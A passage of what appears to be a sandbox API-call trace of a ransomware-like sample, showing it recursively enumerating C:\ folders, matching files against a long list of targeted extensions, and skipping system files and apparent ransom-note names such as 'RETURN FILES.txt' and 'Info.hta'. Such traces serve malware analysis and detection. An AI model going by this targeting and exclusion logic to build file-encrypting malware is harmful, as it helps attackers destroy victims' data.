lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dc3") returned 4 [0032.916] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dcm") returned 4 [0032.916] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dcr") returned 4 [0032.916] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".der") returned 4 [0032.916] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dib") returned 4 [0032.916] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dic") returned 4 [0032.916] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".dif") returned 4 [0032.916] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0032.916] lstrlenW (lpString=".divx") returned 5 [0032.916] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0032.916] lstrlenW (lpString=".djvu") returned 5 [0032.916] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0032.916] lstrlenW (lpString=".dng") returned 4 [0032.917] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".doc") returned 4 [0032.917] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".docm") returned 5 [0032.917] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0032.917] lstrlenW (lpString=".docx") returned 5 [0032.917] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0032.917] lstrlenW (lpString=".dot") returned 4 [0032.917] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dotm") returned 5 [0032.917] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0032.917] lstrlenW (lpString=".dotx") returned 5 [0032.917] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0032.917] lstrlenW (lpString=".dpx") returned 4 [0032.917] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dqy") returned 4 [0032.917] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dsn") returned 4 [0032.917] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dt") returned 3 [0032.917] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0032.917] lstrlenW (lpString=".dtd") returned 4 [0032.917] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dwg") returned 4 [0032.917] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dwt") returned 4 [0032.917] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".dx") returned 3 [0032.917] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0032.917] lstrlenW (lpString=".dxf") returned 4 [0032.917] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0032.917] lstrlenW (lpString=".edml") returned 5 [0032.917] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0032.917] lstrlenW (lpString=".efd") returned 4 [0032.917] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".elf") returned 4 [0032.918] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".emf") returned 4 [0032.918] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".emz") returned 4 [0032.918] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".epf") returned 4 [0032.918] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".eps") returned 4 [0032.918] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".epsf") returned 5 [0032.918] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0032.918] lstrlenW (lpString=".epsp") returned 5 [0032.918] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0032.918] lstrlenW (lpString=".erf") returned 4 [0032.918] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".exr") returned 4 [0032.918] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".f4v") returned 4 [0032.918] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".fido") returned 5 [0032.918] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0032.918] lstrlenW (lpString=".flm") returned 4 [0032.918] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".flv") returned 4 [0032.918] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".frm") returned 4 [0032.918] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".fxg") returned 4 [0032.918] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".geo") returned 4 [0032.918] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0032.918] lstrlenW (lpString=".gif") returned 4 [0032.918] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".grs") returned 4 [0032.919] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".gz") returned 3 [0032.919] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0032.919] lstrlenW (lpString=".h") returned 2 [0032.919] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0032.919] lstrlenW (lpString=".hdr") returned 4 [0032.919] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".hpp") returned 4 [0032.919] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".hta") returned 4 [0032.919] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".htc") returned 4 [0032.919] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".htm") returned 4 [0032.919] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".html") returned 5 [0032.919] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0032.919] lstrlenW (lpString=".icb") returned 4 [0032.919] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".ics") returned 4 [0032.919] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".iff") returned 4 [0032.919] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".inc") returned 4 [0032.919] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0032.919] lstrlenW (lpString=".indd") returned 5 [0032.919] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0032.919] lstrlenW (lpString=".ini") returned 4 [0032.919] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0032.919] lstrlenW (lpString="desktop.ini") returned 11 [0032.919] lstrlenW (lpString=".0day") returned 5 [0032.919] lstrcmpiW (lpString1=".0day", lpString2="p.ini") returned -1 [0032.919] lstrlenW (lpString="desktop.ini") returned 11 [0032.920] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0032.920] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0032.920] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0032.920] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0032.920] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0032.920] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0032.920] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0032.920] lstrcmpiW (lpString1="agent1c.exe", lpString2="desktop.ini") returned -1 [0032.920] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.920] FindNextFileW (in: hFindFile=0x3751b68, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0032.920] FindClose (in: hFindFile=0x3751b68 | out: hFindFile=0x3751b68) returned 1 [0032.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3741b60 | out: hHeap=0x5f0000) returned 1 [0032.920] FindNextFileW (in: hFindFile=0x3740b18, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0032.920] FindClose (in: hFindFile=0x3740b18 | out: hFindFile=0x3740b18) returned 1 [0032.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3730b10 | out: hHeap=0x5f0000) returned 1 [0032.920] FindNextFileW (in: hFindFile=0x3730ad0, lpFindFileData=0x2edfd00 | out: lpFindFileData=0x2edfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0032.920] lstrlenW (lpString="C:\\Boot") returned 7 [0032.920] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0032.920] lstrlenW (lpString="Boot") returned 4 [0032.920] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0032.920] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3730b10 [0032.920] lstrlenW (lpString="C:\\Boot") returned 7 [0032.920] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e10e0 [0032.921] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.921] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0032.921] lstrlenW (lpString="BCD") returned 3 [0032.921] lstrlenW (lpString=".1cd") returned 4 [0032.921] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".3ds") returned 4 [0032.921] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".3fr") returned 4 [0032.921] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".3g2") returned 4 [0032.921] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".3gp") returned 4 [0032.921] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".7z") returned 3 [0032.921] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0032.921] lstrlenW (lpString=".accda") returned 6 [0032.921] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".accdb") returned 6 [0032.921] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".accdc") returned 6 [0032.921] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".accde") returned 6 [0032.921] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".accdt") returned 6 [0032.921] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0032.921] lstrlenW (lpString=".accdw") returned 6 [0032.921] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".adb") returned 4 [0032.922] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".adp") returned 4 [0032.922] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ai") returned 3 [0032.922] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0032.922] lstrlenW (lpString=".ai3") returned 4 [0032.922] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ai4") returned 4 [0032.922] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ai5") returned 4 [0032.922] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ai6") returned 4 [0032.922] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ai7") returned 4 [0032.922] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ai8") returned 4 [0032.922] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".anim") returned 5 [0032.922] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".arw") returned 4 [0032.922] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".as") returned 3 [0032.922] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0032.922] lstrlenW (lpString=".asa") returned 4 [0032.922] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".asc") returned 4 [0032.922] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".ascx") returned 5 [0032.922] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".asm") returned 4 [0032.922] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0032.922] lstrlenW (lpString=".asmx") returned 5 [0032.922] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".asp") returned 4 [0032.923] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".aspx") returned 5 [0032.923] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".asr") returned 4 [0032.923] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".asx") returned 4 [0032.923] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".avi") returned 4 [0032.923] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".avs") returned 4 [0032.923] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".backup") returned 7 [0032.923] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".bak") returned 4 [0032.923] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".bay") returned 4 [0032.923] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".bd") returned 3 [0032.923] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0032.923] lstrlenW (lpString=".bin") returned 4 [0032.923] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".bmp") returned 4 [0032.923] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".bz2") returned 4 [0032.923] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".c") returned 2 [0032.923] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0032.923] lstrlenW (lpString=".cdr") returned 4 [0032.923] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".cer") returned 4 [0032.923] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0032.923] lstrlenW (lpString=".cf") returned 3 [0032.923] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0032.924] lstrlenW (lpString=".cfc") returned 4 [0032.924] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cfm") returned 4 [0032.924] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cfml") returned 5 [0032.924] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cfu") returned 4 [0032.924] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".chm") returned 4 [0032.924] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cin") returned 4 [0032.924] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".class") returned 6 [0032.924] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".clx") returned 4 [0032.924] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".config") returned 7 [0032.924] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cpp") returned 4 [0032.924] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cr2") returned 4 [0032.924] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".crt") returned 4 [0032.924] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".crw") returned 4 [0032.924] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cs") returned 3 [0032.924] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0032.924] lstrlenW (lpString=".css") returned 4 [0032.924] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".csv") returned 4 [0032.924] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".cub") returned 4 [0032.924] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0032.924] lstrlenW (lpString=".dae") returned 4 [0032.925] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dat") returned 4 [0032.925] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".db") returned 3 [0032.925] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0032.925] lstrlenW (lpString=".dbf") returned 4 [0032.925] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dbx") returned 4 [0032.925] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dc3") returned 4 [0032.925] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dcm") returned 4 [0032.925] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dcr") returned 4 [0032.925] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".der") returned 4 [0032.925] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dib") returned 4 [0032.925] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dic") returned 4 [0032.925] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dif") returned 4 [0032.925] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".divx") returned 5 [0032.925] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".djvu") returned 5 [0032.925] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".dng") returned 4 [0032.925] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".doc") returned 4 [0032.925] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".docm") returned 5 [0032.925] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0032.925] lstrlenW (lpString=".docx") returned 5 [0032.925] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dot") returned 4 [0032.926] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dotm") returned 5 [0032.926] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dotx") returned 5 [0032.926] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dpx") returned 4 [0032.926] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dqy") returned 4 [0032.926] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dsn") returned 4 [0032.926] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dt") returned 3 [0032.926] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0032.926] lstrlenW (lpString=".dtd") returned 4 [0032.926] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dwg") returned 4 [0032.926] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dwt") returned 4 [0032.926] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".dx") returned 3 [0032.926] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0032.926] lstrlenW (lpString=".dxf") returned 4 [0032.926] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".edml") returned 5 [0032.926] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".efd") returned 4 [0032.926] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".elf") returned 4 [0032.926] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".emf") returned 4 [0032.926] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".emz") returned 4 [0032.926] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0032.926] lstrlenW (lpString=".epf") returned 4 [0032.927] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".eps") returned 4 [0032.927] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".epsf") returned 5 [0032.927] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".epsp") returned 5 [0032.927] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".erf") returned 4 [0032.927] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".exr") returned 4 [0032.927] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".f4v") returned 4 [0032.927] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0032.927] lstrlenW (lpString=".fido") returned 5 [0032.927] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0032.927] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.927] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0032.930] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.931] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.931] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0032.931] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0032.931] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0032.931] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0032.932] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, 